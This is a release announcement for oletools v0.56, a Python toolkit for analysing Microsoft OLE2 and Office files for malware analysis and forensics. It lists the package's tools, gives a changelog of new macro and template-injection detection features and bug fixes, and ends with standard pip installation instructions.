oletools v0.56: analyze MS OLE2 files & MS Office documents, for malware analysis, forensics & debugging
oletools is a package of python tools to analyze Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office documents or Outlook messages, mainly for malware analysis, forensics and debugging. It is based on the olefile parser. See here for more info.
- olebrowse: A simple GUI to browse OLE files (e.g. MS Word, Excel, Powerpoint documents), to view and extract individual data streams.
- oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
- olemeta: to extract all standard properties (metadata) from OLE files.
- oletimes: to extract creation and modification timestamps of all streams and storages.
- oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
- olemap: to display a map of all the sectors in an OLE file.
- olevba: to extract and analyze VBA Macro source code from MS Office documents (OLE and OpenXML).
- MacroRaptor: to detect malicious VBA Macros
- pyxswf: to detect, extract and analyze Flash objects (SWF) that may be embedded in files such as MS Office documents (e.g. Word, Excel) and RTF, which is especially useful for malware analysis.
- oleobj: to extract embedded objects from OLE files.
- rtfobj: to extract embedded objects from RTF files.
- and a few others (coming soon)
- added detection of trigger _OnConnecting
- updated plugin_biff to v0.0.17 to improve Excel 4/XLM macros parsing
- added simple analysis of Excel 4/XLM macros in XLSM files (PR #569)
- added detection of template injection (PR #569)
- added detection of many suspicious keywords (PR #591 and #569, see https://www.certego.net/en/news/advanced-vba-macros/)
- improved MHT detection (PR #532)
- added –no-xlm option to disable Excel 4/XLM macros parsing (PR #532)
- fixed bug when decompressing raw chunks in VBA (issue #575)
- fixed bug with email package due to monkeypatch for MHT parsing (issue #602, PR #604)
- fixed option –relaxed (issue #596, PR #595)
- enabled relaxed mode by default (issues #477, #593)
- fixed detect_vba_macros to always return VBA code as
unicode on Python 3 (issues #455, #477, #587, #593)
- replaced option –pcode by –show-pcode and –no-pcode,
replaced optparse by argparse (PR #479)
- oleform: improved form parsing (PR #532)
- oleobj: “Ole10Native” is now case insensitive (issue #541)
- clsid: added PDF (issue #552), Microsoft Word Picture (issue #571)
- ppt_parser: fixed bug on Python 3 (issues #177, #607, PR #450)
Download and Install:
The recommended way to download and install/update the latest stable release of oletools is to use pip:
- On Linux/Mac:
sudo -H pip install -U oletools
- On Windows:
pip install -U oletools
This should automatically create command-line scripts to run each tool from any directory:
To get the latest development version instead:
- On Linux/Mac:
sudo -H pip install -U https://github.com/decalage2/oletools/archive/master.zip
- On Windows:
pip install -U https://github.com/decalage2/oletools/archive/master.zip
Copyright (c) 2012-2019 Philippe Lagadec